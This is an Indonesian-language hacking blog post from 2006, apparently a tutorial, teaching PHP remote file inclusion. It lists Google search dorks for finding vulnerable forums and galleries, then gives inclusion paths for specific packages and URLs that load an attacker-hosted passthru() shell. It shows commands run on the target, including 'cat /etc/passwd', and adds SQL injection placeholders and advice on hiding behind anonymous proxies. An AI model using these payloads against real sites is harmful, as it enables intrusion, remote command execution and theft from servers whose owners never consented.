Sunday, February 12, 2006

Php Injection (updated every day)

Pada kesempatan kali ini kita akan membahas mengenai PhpInjection, apa itu PhpInjection? Bagaimana menemukannya dan bagaimana penanganannya.
Pertama kali kita membutuhkan sedikit keahlian yaitu mengenal sedikit tentang apa dan bagaimana itu script php. Script php merupakan salah satu script yang sampai saat ini banyak digunakan oleh seorang webmaster, disamping rival nya Java. Script php ini begitu 'Powerfull', mengapa dikatakan demikian karena dalam script php ini kita bisa melakukan banyak hal. Mulai dari membuat file, membuat counter, membuat date, membuat bukutamu, membuat forum (salah satunya PhpBB), mengakses database secara langsung maupun juga membuat gambar dan animasi. Kesemuanya itu sudah terdapat dalam fungsi dari script php ini. Nah karena hal itu lah maka masih banyak orang yang menggunakannya untuk membangun sebuah website, selain karena cukup mudah dipelajari.
Disini kita tidak akan membahas mengenai bagaimana melakukan semua itu, karena maaf ini bukan saatnya untuk belajar php tapi saatnya belajar hacking dengan menggunakan kelebihan dari script php dan kelemahan dari webmaster yang menggunakannya. Jadi cukup sudah basa-basinya.
Begitu banyak orang menanyakan bagaimana untuk mencari bugs pada script php yang ada, sebenarnya ilmu ini sudah lama dan tutorial nya juga sudah begitu banyak di tulis oleh berbagai orang pada berbagai website tentang security jaringan dan hacker, baik milik komunitas maupun milik pribadi. Pada kesempatan ini biarlah saya mengulas sedikit dan mengulang kembali tentang injection pada script php yang lebih dikenal dengan nama PhpInjection.

1. Seperti dijelaskan diatas script php banyak memiliki kelebihan dan mudah digunakan. Nah otomatis banyak webmaster yang menggunakan nah otomatis sasaran kita juga semakin banyak (walau untuk sekarang ini hanya sedikit karena webmaster sudah menyadari kekurangannya).
2. Sebelum kita menggunakan ilmu kita dan memulai pencarian kita, jangan lupa selalu siapkan 2 point penting dari semuanya. Apa itu? Tentu saja 'ROKOK' dan 'KOPI'. Nah setelah kita santai dan dapat berkonsentrasi maka kita bisa mulai aksi kita.
3. Pertama kali kita harus mengakui kehebatan dari om 'Google' dari sana lah kita mendapatkan semuanya. Nah untuk menambah kasanah pengetahuan tentang 'Google hack ada baiknya kita membaca buku 'Hack Attack' Cara dan penanggulanganya oleh teman kita dari jasakom.Atau kunjungi saja langsung situs www. jasakom.com.
Nah untuk memulai pencarian kita masukkanlah kata kunci berikut untuk mendapatkan target kita :
Untuk forum :
allinurl:my_egallery site:.org
allinurl:xgallery site:.org
allinurl:coppermine site:.org
allinurl:4nAlbum site:.org
allinurl:PNphpBB2 site:.org
allinurl:ihm.php?p=
allinurl:.php?bodyfile=
allinurl:/default.php?page=home
allinurl:/folder.php?id=
allinurl:main.php?pagina=
allinurl:/modules.php?name=allmyguests
allinurl:AshNews atau allinurl: /ashnews.php
allinurl:ihm.php?p=*
allinurl:kietu/hit_js.php
allinurl:/Popper/index.php?
keyword : "Powered by phpBB 2.0.6"
keyword : "powered by CubeCart 3.0.6"
keyword : "powered by paBugs 2.0 Beta 3"
Keyword : "powered by AllMyLinks"
keyword : /phorum/login.php
keyword : "powered eyeOs"
allinurl:/includes/orderSuccess.inc.php?glob=
allinurl:modules.php?name=Forums

Harap diperhatikan bahwa masih banyak alternatif yang lain yang bisa digunakan sebagai keyword.
Kalo memang rajin coba liat ajah listnya di :
-= http://www.geocities.com/k4k3_rgb/list.txt =-

4. Nah cara kamu menginject adalah dengan index.php?page=http://www.jasakom.com
atau kalau kamu tidak berhasil coba dengan list berikut :
Ganti modul :

1. my_egallery: /modules/My_eGallery/public/displayCategory.php?basepath=
2. xgallery: /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. coppermine: /modules/coppermine/themes/default/theme.php?THEME_DIR
4. 4nAlbum: /modules/4nAlbum/public/displayCategory.php?basepath=
5. PNphpBB2 /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
6. AllMyGuests: /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
7. /Popper/index.php? : /Popper/index.php?childwindow.inc.php?form=
8. kietu : kietu/index.php?kietu[url_hit]=
9. "Powered by phpBB 2.0.6" : &highlight=%2527.include($_GET[a]),exit.%2527&a=
10. "powered by CubeCart 3.0.6" : /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
11. "powered by paBugs 2.0 Beta 3" : /class.mysql.php?path_to_bt_dir=
12. "powered by AllMyLinks" : /include/footer.inc.php?_AMLconfig[cfg_serverpath]=
13. /phorum/login.php : /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

14. "powered eyeOs" : /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

15. /includes/orderSuccess.inc.php?glob : http://[target]/[path]/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

16 allinurl:modules.php?name=Forums : /modules.php?name=
=============================================================================
http://www.target.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/index_overview.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/image-gd.class.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/album.class.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/show_random.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/main.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.injection.com/cmd?

==========================================================================
5. Kalau kamu bisa melihat web jasakom.com, berarti sasaran sudah ditemukan. Jika belum berarti tutup dan beralih lah pada website berikutnya. Sebagai catatan bahwa untuk sekarang begitu banyak web sudah di patch, so jangan patah semangat dan teruslah berusaha. Dan juga jangan lupa semua orang yang membuka website dapat diketahui ipnya dari log file web server, terutama sekarang banyak web jebakan untuk mencatat ip yang mencoba menyerang, so jangan lupa gunakanlah anonymous proxy ato fake address untuk mengaburkan identitas kamu.

6. Nah klo udah dapet target maka mari kita selanjutnya kita harus cari webhosting gratis. Webhosting ini tidak perlu mendukung php.

Kemudian kita buat file dengan nama test.txt (nama file bebas). Isi file tersebut sebagai berikut:

passthru($test);
?>

simpan file tersebut, lalu upload ke webserver yang telah kita cari sebelumnya.

Sekarang kita siap untuk melakukan aksi kita.
Ketikkan di address bar dari browser kita alamat berikut:

http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&?&test=cal

jika kita berhasil maka kita akan mendapatkan respon sebagai berikut:
June 2004 Su Mo Tu We Th Fr Sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30


7. Nah klo kamu mau exploit coba yang satu ini :
http://www.example.com/index.php?module=subjects&func=listpages&subid=[SQL]
http://www.example.com/index.php?module=subjects&func=viewpage&pageid=[SQL]
http://www.example.com/index.php?module=subjects&func=listcat&catid=[SQL]

8. Gimana kalo kita masukkan perintah untuk menampilkan password account di server tersebut??

http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&?&test=cat /etc/passwd

Nah kita bisa dapet dech passwd nya. Hmm setelah dapet passwd ngapain lagi yach ... terserah dech. Tapi jangan lah kasian mending kasih tau admin suruh patch sistem. hehehe

Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.

Thanks to,
#hackcrew, #binushacker, #kampunghacker, #batamhacker, #yogyafree dan semua pihak yang tidak bisa di sebut kan satu persatu.
Sumber :
Pengalaman Pribadi penulis
-= http://www.jasakom.com/article.aspx?ID=517 =-
-= http://www.clemens-fatek.com =-
-= http://www.yogyafree.net =-
-= http://www.hitam-putih.com =-
Post a Comment